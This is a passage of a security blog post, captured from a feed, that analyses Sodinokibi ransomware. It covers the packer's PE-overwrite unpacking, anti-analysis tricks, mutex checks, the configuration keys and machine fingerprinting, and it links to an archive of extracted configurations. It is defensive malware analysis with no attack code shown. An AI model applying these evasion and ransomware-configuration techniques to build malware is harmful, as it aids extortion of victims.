&lt;h3&gt;Matteo Lodi, Threat Intelligence Lead Engineer; Marco Bompani, Security Analyst&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Malware Tales: Sodinokibi]]></title><description><![CDATA[Hi everyone! Today we are looking at a threat that appeared recently: a new ransomware called Sodinokibi.]]></description><link>https://www.certego.net/blog/malware-tales-sodinokibi/</link><guid isPermaLink="false">malware-tales-sodinokibi</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Team Leader]]></dc:creator><pubDate>Thu, 13 Jun 2019 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi everyone! Today we are looking at a threat that appeared recently: a new ransomware called Sodinokibi.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;The Threat&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;The Loader&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Mutex and Configuration&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Machine information recovery&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Encryption preparation inspired by GandCrab&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Ransomware attack&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;C2 Registration&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;_&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;1.The Threat&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;The first noteworthy appearance was at the end of April &lt;a href=&quot;https://blog.talosintelligence.com/sodinokibi-ransomware-exploits-weblogic/&quot;&gt;(Talos Research)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Then, at the start of this month, we gathered different reports of this threat being spread in Italy (eg:  &lt;a href=&quot;https://twitter.com/JAMESWT_MHT/status/1135543914402725888&quot;&gt;JAMESWT_MHT&apos;s tweet&lt;/a&gt;), both via malspam and known server vulnerabilities.&lt;br&gt;
Also, there was the announcement of the shutdown of the GandCrab Operation &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-2-billion/&quot;&gt;Bleeping Computer&lt;/a&gt;, just some days earlier.&lt;/p&gt;
&lt;p&gt;Coincidence? We’ll see.&lt;/p&gt;
&lt;p&gt;Our guess is that this new payload could be used as a replacement of &lt;em&gt;&lt;strong&gt;GandCrab&lt;/strong&gt;&lt;/em&gt; in the RAAS (Ransomware-as-a-service) panorama.&lt;/p&gt;
&lt;p&gt;Therefore, in order to protect our customers effectively, we went deep into the analysis of this ransomware.&lt;/p&gt;
&lt;p&gt;Mainly we analyzed two different samples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;version 1.01: md5: e713658b666ff04c9863ebecb458f174&lt;/li&gt;
&lt;li&gt;version 1.00: md5: bf9359046c4f5c24de0a9de28bbabd14&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;2.The Loader&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Like every malware who deserves respect, &lt;em&gt;&lt;strong&gt;Sodinokibi&lt;/strong&gt;&lt;/em&gt; is protected by a custom packer that is different for each sample.&lt;/p&gt;
&lt;p&gt;The method used by the version 1.01 sample to reconstruct the original payload is called “&lt;em&gt;&lt;strong&gt;PE overwrite&lt;/strong&gt;&lt;/em&gt;”.&lt;/p&gt;
&lt;p&gt;To perform this technique, the malicious software must allocate a new area inside its process memory and fill it with the code that has the duty to overwrite the mapped image of the original file with the real malware payload. In this case, first the process allocates space in the Heap via LocalAlloc, then it writes the “&lt;em&gt;&lt;strong&gt;unpacking stub&lt;/strong&gt;&lt;/em&gt;” code, it signs that space as executable with VirtualProtect and finally it redirects the execution flow to the new memory space&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 736px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/61a3ee439a34c6b243502843ddfb32ff/f941f/MalwareTalesSo1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 31.510416666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVUlEQVR42g3OzU7CMAAA4L2ij2F8EhOj8aAHYzyYkOCBGHeAECMwYIN1G+NnW2G0XdcWtu4PhGBi4kGS7wE+5ZiL0y6tOPJqr6ilZnQNHbPTbKKFHTKmQx8FIfUZnjW8xYWgz1U6KbbsUPBjIZS93P7sZMrJ3HNjhkpORQiXDjgmERTyK9BEVBPog8KbmFzuc/VQtIuteaqy71woKMgqmSWIqC9PmtpISIi8qWMM6HzSXaE318RBj3mjlX9F0V0q7CIZceImMc42kfJ32v0ecsnw1DJDON9EmJN1jFfnC0bxbLmIWSjFhhPOCBFRVEl53JWl3OQJV8yRblm2O3Vs1+n0NLXVHgz1Qb8PANC0rg0svfc5BqZlgaGu26Y5Ho19CIMALjxf6X+1O+2mD5ypYTzdPj5c37/X61Hg+zMwMbozfegZNnY9ugxShsuU5VtaJHF5lrJ/Uu0qaWgkONAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/61a3ee439a34c6b243502843ddfb32ff/f941f/MalwareTalesSo1.png&quot;
        srcset=&quot;/website/static/61a3ee439a34c6b243502843ddfb32ff/804b2/MalwareTalesSo1.png 384w,
/website/static/61a3ee439a34c6b243502843ddfb32ff/f941f/MalwareTalesSo1.png 736w&quot;
        sizes=&quot;(max-width: 736px) 100vw, 736px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;In order to slow the analysis, the loader contains a lot of junk code that will be never executed.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1141px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/56e0f4d0969921f47d82ce21716465d4/cd1d6/MalwareTalesSo2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.854166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdklEQVR42h2P7W+aUBSH+dObZR/6fyxZ5oel3Qsg9xWwIPcK9wIWlFmHCrUbap22jboau+uenJOcnPxOnhwNIQQhtG2qUDOAMOqxLE9+DqrkR1X+ro8vT3eDFGHk2Db6jwo7jgMR0QzTMC2rDeB3Qzfa5pev325cJFlL+C0vuizuPjQ1SaVvtoFhqmhbN0z9fGGptJb6fiG8LOwKr5sylsq4H3PJkeAwj0Ge2ILhW8mKLJbcTwXrS36biLwvKSEaS8erarh9CJrqUzP7vKyvdovk+WH8VA+P6/rvarqtBpsqOzSjXTPeLSa7Rfm6nb/tl8zraB8JpMTt0JbtXCD8npJ3IrhOeDfmrmQ3meRZ3Euis1CGQcj8kHkiDJKIE2XuKD3FmLqU9iDqxr3+LB/WxWhUZs0kOqznry+Pp/2f1a+ZrhuYEISxKgCgoX6mtsI5t0PUPo6CaVncT8tJM9k8jk779emweTs+b5dzAIDrus4ZFyNkWfAfR8VPNj0KGgsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/56e0f4d0969921f47d82ce21716465d4/cd1d6/MalwareTalesSo2.png&quot;
        srcset=&quot;/website/static/56e0f4d0969921f47d82ce21716465d4/804b2/MalwareTalesSo2.png 384w,
/website/static/56e0f4d0969921f47d82ce21716465d4/e5715/MalwareTalesSo2.png 768w,
/website/static/56e0f4d0969921f47d82ce21716465d4/cd1d6/MalwareTalesSo2.png 1141w&quot;
        sizes=&quot;(max-width: 1141px) 100vw, 1141px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Also, in the following image, we can see that it tries to hide some important strings from the static analysis like “ kernel32.dll”. It leverages “&lt;em&gt;&lt;strong&gt;stack strings&lt;/strong&gt;&lt;/em&gt;” plus the randomization of the order of the characters.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 672px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/65b5b31c8ea7756f651853c6e0901e75/30d16/MalwareTalesSo3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 79.6875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC40lEQVR42kWSW2+kNhzF+d79DH2u+lBVVXbT9mFVqWrV7k1Nc50MDHcb8GCbi4eLYYAhEIYJydQk6a50Hvzy0/n7nCPF2GXU27c8gCY0b31Xv2+yLSMOUH0C+3TbZud8831Vgmmoj/tG6GmoD3f8uK+lmLhJgATMPEAck2GnSsOcIM9TcQju0s1YZrvytOZ/Tt1XeKjix76c4c3snDMP4rUeYVBnUU7WrqutKeiydCyjhr9t+Mepr77A+xeYEU84D7ucIei7WuTbz7Bw1kng9AIuoh1/U/P3D//DQjPcFVLkO/Ofdzx2bewYEYZ1PsOOo+IACrjPaJWfNMWHqa+fbWeNNXvsCykIME9oXyUhMAkyqGcWjHDqQ6h4vnmXJO0G5/GPNf/w0FVTVz6K2A5tX4T7JpVubi7f//EbXduOqujLK6jLAYKetloszhRjkWGSIbvYnPDN30mIyyTgjJRpmBBQJURaXP7z6a/fIx+6hrxSLixtESJIgKXIV55rt5ss8wFnbwSchn6VhXUeV1kk4DqjUogdngSdOBtaeG0EyCoZLULsOVoYo7EqhyLi7Kem+CjOfuiKl7PveDBUGynCjmhLpB2vAXLUyAdNHouqHFcJIm8st3Paxc8C/lKVeDQJvq+S154FHHhWiG1GoaiqCHwXqQnzp6rZl/Gu+GVXfn5J+zg2opo2p4/3zyNh1BWTDNF8dkRm5yLA0F0mDE11NZZhW/7aFJ8Oc9Tbp31z6La1cN5upNdtdwVDDhE9+2Cb0YR6nmP7BHdZfV+kJT/dbc+exv1xGo7jbjZv0mkeCfGQa4nMsG1RCKgPKPUQOgfGW1P/AWonhv6dCr5xnW9jesrCd0ObjF09tNtDV0uGbtiWKEbWNN00jNVKhTZQ5KVprjT58+3y3LLVlSIb+kqVL3RTCaMoCF8lXS7PFqsL+fZaWV6Lx+3NhaJcXyv/LpQr+ebKWqkIAmjpaxf4Lly7EKOv+g++fEniegFSyQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/65b5b31c8ea7756f651853c6e0901e75/30d16/MalwareTalesSo3.png&quot;
        srcset=&quot;/website/static/65b5b31c8ea7756f651853c6e0901e75/804b2/MalwareTalesSo3.png 384w,
/website/static/65b5b31c8ea7756f651853c6e0901e75/30d16/MalwareTalesSo3.png 672w&quot;
        sizes=&quot;(max-width: 672px) 100vw, 672px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;At this point, the unpacking stub resolves dynamically the functions that he needs like VirtualAlloc. Then it performs the overwrite of the original image base with the new decrypted payload.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1023px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/de8613e026629503ac7912d6741a1176/8ea22/MalwareTalesSo4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 48.4375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7klEQVR42iWSS2/bMBCE9f//SA899NIeUjRugbRxHcuWqLdEUqQoiZRIUy/L8iNxUgIFPgywwCwwO1hrVJVgcGiYpOg6q0Xz0P8kamdQUhyK11ndT/p+7t8vw/vS30/d26nDKI4Dh8LUalH2+PAVhW7ueeOBa0439ipwYgwSgIPEt2P3L4zcNNg3DGlRHLumIAlLnCoBVht76+cnQZGi6HJUl76O3M+cAMWYUDRPQB67JPOKzNeCaEFvs25qqkuoGbTaApYMSyk6zt6OqtNym7mjJJOJrdjUkltf3ReTVpvkr7O+Tqqi8FAigWNL1YThuK1InSXmnlmLrfNAUXygVSXpqatvQ3Me2svYXid5HeVlkgVOCxjkIbAEzWLfgSFgOFGCyRKn4ReKHFmwpW+XSS/jYRnVaZDnSc+9vM5dGoc/H384u62VwwgnodkoKaoKAxZlVVNkxprldYGNirpoOSsJsjd/wP4lDcHmafXy+5e13WyiyAsi4ALbAPy90b29jkIvjoI0CrMkyjEkGGZp/Py0Wn3/5tvrydTOCysKNxnf5wJAvk/5DnEXC0dqfD61y9x+3EaDqcro1LeiIt7uGQb2/ag+Zm1BbNwBFRHhPuIe4SEVodJ0npp5bN6W/j/mT+ZBMYJ918ZJcBnUWct//+AQB8hYfj0AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/de8613e026629503ac7912d6741a1176/8ea22/MalwareTalesSo4.png&quot;
        srcset=&quot;/website/static/de8613e026629503ac7912d6741a1176/804b2/MalwareTalesSo4.png 384w,
/website/static/de8613e026629503ac7912d6741a1176/e5715/MalwareTalesSo4.png 768w,
/website/static/de8613e026629503ac7912d6741a1176/8ea22/MalwareTalesSo4.png 1023w&quot;
        sizes=&quot;(max-width: 1023px) 100vw, 1023px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Finally, it transfers the execution to the OEP (Original Entry Point) of the unpacked Sodinokibi payload.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1034px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2286df1242b1026ec132ed0dde4954a5/709cb/MalwareTalesSo5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 47.39583333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAABu0lEQVR42h2RaW+jMBBA+f9/Z1faaquqzabaKElLuIwvwGBzn7HJAWkaSiI9jTQfnkaap02jLEQQUFgEXhuH82ozw7YXFctojNWhmgZ5G/bTg9u5my5KRDQ2tpJCbbr2ufAYAQWntU/HnHMGIUQZzUjgxg2fRvU9Ow/zLo8qT6MWW0OINR8dnfV68fQ7ICgNsMyFg9YY63USJbEXx15bCNWkskpUk8kqllWaxWEnvCFl2iDrxEec4ZSHtWDXvt55BIX6uY1ODT936SCLS1+dumxU5SjLQVY8wAWDbUi0r2MtfOhjm2OYUKy6xHMtQzd8A1G8O6jyvC8HVR27fOzrsywvhyagSN+ugGNqVRKEBBDXCjAIKRSM5DFLI5aJqMi56sr+gWqLmUywOo8RsF6en5aLV235780ydwRDF9iubQHTQBAgYLr2jiKEgINcx6PE9+g8317+Pv/5tduukP1p6Rtt/f7qOh+EGABsXWuN9f+mtUJY58QVPupKcX9VnR7avM6FCImxWWJHn4vOCTRz8+4HRpgCG25JaEQJcOEni9zjPtsX/Hu4h71d5PSlzn0jIt/4mM/qt0FeT/sfeYLcFvIJHN4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2286df1242b1026ec132ed0dde4954a5/709cb/MalwareTalesSo5.png&quot;
        srcset=&quot;/website/static/2286df1242b1026ec132ed0dde4954a5/804b2/MalwareTalesSo5.png 384w,
/website/static/2286df1242b1026ec132ed0dde4954a5/e5715/MalwareTalesSo5.png 768w,
/website/static/2286df1242b1026ec132ed0dde4954a5/709cb/MalwareTalesSo5.png 1034w&quot;
        sizes=&quot;(max-width: 1034px) 100vw, 1034px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3.Mutex and Configuration&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Once unpacked, the sample tries to create a &lt;em&gt;&lt;strong&gt;mutex&lt;/strong&gt;&lt;/em&gt; object. It calls CreateMutexW, then, if there was an error, with RtlGetLastWin32Error it would extract the generated error. Indeed, if the mutex already existed, the error would have been “0xB7” (&quot;ERROR_ALREADY_EXISTS&quot; ref &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createmutexa&quot;&gt;docs&lt;/a&gt; ). In that case a function is called that terminates the process.&lt;/p&gt;
&lt;p&gt;We found that the mutex name is different for each sample but following this pattern: “&lt;em&gt;&lt;strong&gt;Global{UUID}&lt;/strong&gt;&lt;/em&gt;”. Therefore it’s a method to detect the malware or to vaccinate the endpoint (&lt;a href=&quot;https://zeltser.com/malware-vaccination-infection-markers/&quot;&gt;Zeltser blog&lt;/a&gt;) that is reliable only for a specific sample.&lt;/p&gt;
&lt;p&gt;Going forward, we found the configuration in an encrypted form in the section “ &lt;em&gt;&lt;strong&gt;.zeacl&lt;/strong&gt;&lt;/em&gt;” for v.1.01 or “&lt;em&gt;&lt;strong&gt;.grrr&lt;/strong&gt;&lt;/em&gt;” for v.1.00. Once extracted, we noticed that it’s a JSON file.&lt;/p&gt;
&lt;p&gt;These are the keys found in the configuration.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;pk&lt;/strong&gt;&lt;/em&gt;” -&gt; base64 encoded key used to encrypt files&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;pid&lt;/strong&gt;&lt;/em&gt;” -&gt; personal id of the actor&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;sub&lt;/strong&gt;&lt;/em&gt;” -&gt; another id, maybe related to the specific campaign&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;dbg&lt;/strong&gt;&lt;/em&gt;” -&gt; debug mode&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;fast&lt;/strong&gt;&lt;/em&gt;” -&gt; fast mode&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;wipe&lt;/strong&gt;&lt;/em&gt;” -&gt; enable wipe of specific directories&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;wht&lt;/strong&gt;&lt;/em&gt;” -&gt; whitelist dictionary&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;fld&lt;/strong&gt;&lt;/em&gt;” -&gt; keyword in whitelisted directories&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;fls&lt;/strong&gt;&lt;/em&gt;” -&gt; whitelisted filenames&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;ext&lt;/strong&gt;&lt;/em&gt;” -&gt; whitelisted file extensions&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;wfld&lt;/strong&gt;&lt;/em&gt;” -&gt; directories to wipe&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;prc&lt;/strong&gt;&lt;/em&gt;” -&gt; processes to kill before the encryption&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;dmn&lt;/strong&gt;&lt;/em&gt;” -&gt; domains to contact after encryption&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;net&lt;/strong&gt;&lt;/em&gt;” -&gt; check network resources&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;nbody&lt;/strong&gt;&lt;/em&gt;” -&gt; base64 encoded ransom note body&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;nname&lt;/strong&gt;&lt;/em&gt;” -&gt; ransom note file name&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;exp&lt;/strong&gt;&lt;/em&gt;” -&gt; unknown, expert mode?&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;img&lt;/strong&gt;&lt;/em&gt;” -&gt; base64 encoded message on desktop background&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in manually checking the configuration files we have extracted in the samples we have analyzed, follow this link and download the archive (password:sodinokibi): &lt;a href=&quot;https://www.certego.net/upload/image/4/e/d/sodinokibi_config_files.zip&quot;&gt;sodinokibi_config_files.zip&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Machine information recovery&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Afterwards, Sodinokibi starts to gather information about the infected machine and builds another JSON structure that stores in an encrypted form in the “HKEY_LOCAL_MACHINE\SOFTWARE\recfg\stat” registry key.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 767px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ecf82b171a0f3d24d0143ff751a70ef0/6c2f2/MalwareTalesSo6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 12.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwklEQVR42gG3AEj/APXv5uHe2eTk4PPu5+zg2+Xd1uje2/Dp4e/t5KvSz83WzeDY0fHf39zXaNvYa9zcku7osfjx7fny7fz17QDl3+W5tLOinZnLx8LZzs3Mx8PZ1tDf29Xg39Wu0aC/y4DExH7Yz5HZ1Fre3E7g3lzf3Fbi32Pp5MXk4N4A7Obh083I1M/J7ejg8eLj6uLd8O/j9PDn9vDl29un3eKX6uOb6eOg7eiZ7+uR6+eP5uGK6uWV+vPg+fPtQ/WUIItClOAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ecf82b171a0f3d24d0143ff751a70ef0/6c2f2/MalwareTalesSo6.png&quot;
        srcset=&quot;/website/static/ecf82b171a0f3d24d0143ff751a70ef0/804b2/MalwareTalesSo6.png 384w,
/website/static/ecf82b171a0f3d24d0143ff751a70ef0/6c2f2/MalwareTalesSo6.png 767w&quot;
        sizes=&quot;(max-width: 767px) 100vw, 767px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Keys:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;ver&lt;/strong&gt;&lt;/em&gt;”: version (100 or 101)&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;pid&lt;/strong&gt;&lt;/em&gt;”: previous config “pid”&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;sub&lt;/strong&gt;&lt;/em&gt;”: previous config “sub”&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;pk&lt;/strong&gt;&lt;/em&gt;”: previous config “pk”&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;uid&lt;/strong&gt;&lt;/em&gt;”: user ID. It’s a 8 byte hexadecimal value generated with XOR encryption. First 4 bytes are created from the processor name, while the others are created from the volume serial number extracted with a “GetVolumeInformationW” API call.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 979px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/71483169f9b55bf0ba5291baff58297e/adc48/MalwareTalesSo7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 29.427083333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAABU0lEQVR42g2Oy26CQABF+eGmi2667wc03TRN2mWTJl30kaYb21Sjsb5tVAQHAQV1gIFhGBhGkFFKcnMX9+QmR5KVnm0ZrqP7fv3E3TLDp310iKCgMI92eewWLDjxoBq3a7CeD6E2K4ukzKMyp1KvM1nJrqE+L4zbfRILFuSJH21UBlVBLEG3zFnmoc1DuLN0pCu+rnLiUs+myJYGbc2aEjC6nM/PiiQTqV8xtOg4s/rTw83X5wuyl4cYMeJuTICspWdpLIQZRVWk4a+mj5DavQDqeZmdRIoED6Nl1+x+3F9fvT3etWrv3NNSZFbnjaGaYOasNbgCuxWQ/iYmWsNwUyP+63EfCY4LhlPPqGwL5nPqHRJfpPjICVDkVuNn2O9MxgN5MgbKTGoq09C103CVxc0YqzH2aLCl2EmIF2Onsq2aBpARpC/kfrvRbnwv5DF2bYK2/4biPFAN1ZWrAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/71483169f9b55bf0ba5291baff58297e/adc48/MalwareTalesSo7.png&quot;
        srcset=&quot;/website/static/71483169f9b55bf0ba5291baff58297e/804b2/MalwareTalesSo7.png 384w,
/website/static/71483169f9b55bf0ba5291baff58297e/e5715/MalwareTalesSo7.png 768w,
